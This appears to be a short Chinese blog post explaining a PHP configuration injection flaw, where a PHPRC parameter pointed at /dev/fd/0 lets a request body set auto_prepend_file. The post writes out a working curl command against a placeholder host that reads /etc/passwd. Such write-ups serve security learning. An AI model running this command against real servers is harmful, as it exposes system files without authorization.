当前位置: 首页 > article >正文

【网络安全】PHP配置注入漏洞

article 2024/11/14 14:26:13

未经许可,不得转载。

文章目录

  • 正文

正文

前提:通过探测等方式发现某个 PHP 文件存在 PHPRC 参数:

curl "https://xxx.com/about.php?PHPRC=/dev/fd/0" --data-binary 'auto_prepend_file="/etc/passwd"'

PHPRC 用于指定 PHP 配置文件(php.ini)的路径。通过将其设置为 /dev/fd/0,我们尝试让服务器从标准输入读取 PHP 配置。

--data-binary 参数以二进制格式发送数据,适合传递原始数据而非标准表单参数。

auto_prepend_file 是 PHP 配置选项,可以在执行脚本前自动包含指定文件。这里我们设置为 /etc/passwd,试图读取系统敏感信息。

漏洞证明如下:

在这里插入图片描述


http://www.kler.cn/a/310550.html

相关文章:

  • 图像处理实验二(Image Understanding and Basic Processing)
  • 数据结构-集合
  • Objection
  • Linux相关习题-gcc-gdb-冯诺依曼
  • Python用CEEMDAN-LSTM-VMD金融股价数据预测及SVR、AR、HAR对比可视化
  • MicroPythonBLEHID使用说明——蓝牙鼠标
  • php环境搭建教程
  • float字节序和主机序 网络序传输
  • 优化算法(三)—模拟退火算法(附MATLAB程序)
  • Vue学习记录之四(watch侦听器和watchEffect高级侦听器)
  • Window Server 2019+ 安装 Docker
  • 【数据分析】利用Python+AI+工作流实现自动化数据分析-全流程讲解
  • Vue3流程图插件-Vue Flow
  • supermap iclient3d for cesium中的平移,旋转
  • Linux嵌入式相机 — 项目总结
  • ArcGIS Pro SDK (十四)地图探索 4 书签
  • C语言--结构体(学习笔记)
  • 基于python+django+vue的图书管理系统
  • 光模块SFF-8472
  • 解决Ant Design Vue使用Modal对话框无法关闭的问题《操作Dom不需要降低版本》
  • PostgreSQL的流复制断点续传
  • 选址模型 | 基于混沌模拟退火粒子群优化算法的电动汽车充电站选址与定容(Matlab)
  • linux的redir命令实现端口转发
  • Java研发笔记2——C语言程序设计学习笔记1
  • 封装svg图片
  • fiddler抓包01:工具介绍